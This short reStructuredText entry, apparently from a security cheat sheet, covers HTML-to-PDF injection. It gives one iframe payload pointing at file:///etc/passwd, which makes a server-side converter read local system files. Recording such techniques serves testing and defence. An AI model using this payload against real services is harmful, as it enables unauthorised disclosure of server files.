###########
HTML TO PDF
###########

| When converting HTML to PDF, server interpret HTML tags.
| You can then use iframe to include any file content:

.. code-block:: html

  <iframe src=\"file:///etc/passwd\">
